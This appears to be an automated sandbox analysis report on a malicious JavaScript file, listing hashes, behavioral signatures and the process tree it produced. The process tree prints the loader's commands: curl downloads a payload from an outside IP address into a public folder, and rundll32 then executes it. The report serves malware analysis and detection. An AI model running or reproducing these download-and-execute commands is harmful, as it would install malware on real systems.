Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
15/06/2023, 15:24
Static task
static1
Behavioral task
behavioral1
Sample
document_DB798_Jun_15_1.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
document_DB798_Jun_15_1.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
document_DB798_Jun_15_2.js
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
document_DB798_Jun_15_2.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
document_DB798_Jun_15_3.js
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
document_DB798_Jun_15_3.js
Resource
win10v2004-20230221-en
General
-
Target
document_DB798_Jun_15_1.js
-
Size
5KB
-
MD5
ccbcf7f0c1a6cf533bea8c541cec65c8
-
SHA1
66508c03201f46e065e78e6cbe01e5715e4f764c
-
SHA256
d892f064fd53f65d347124c052e58a7c6f317f759a52d4da23aa8a141cd55890
-
SHA512
e0655d0b9b9b804adb81cf7a27b3f5cd74b6fb84d402a52ed9279cfe88f7ecbe560c0b2d01ed5a98ba87fa780b8c547e5785f3a47300ad42ed8ac4224bd60385
-
SSDEEP
96:EVUHZFSYQYGZjTqH8v/2TuFxD78H8v/2TTxDe7MDsyEBD3MTQyeyZqg1WuTQyv3Q:WB/8o/8iB8ZG
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 4352 wscript.exe 6 4352 wscript.exe 8 4352 wscript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4352 wrote to memory of 1676 4352 wscript.exe 84 PID 4352 wrote to memory of 1676 4352 wscript.exe 84 PID 4352 wrote to memory of 3800 4352 wscript.exe 92 PID 4352 wrote to memory of 3800 4352 wscript.exe 92 PID 3800 wrote to memory of 4416 3800 conhost.exe 93 PID 3800 wrote to memory of 4416 3800 conhost.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\document_DB798_Jun_15_1.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\System32\curl.exe"C:\Windows\System32\curl.exe" -o c:\users\public\tangier.tmp http://158.255.213.54/vMCtB/AD0572⤵PID:1676
-
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" rundll32.exe c:\users\public\tangier.tmp,must2⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\System32\rundll32.exerundll32.exe c:\users\public\tangier.tmp,must3⤵PID:4416
-
-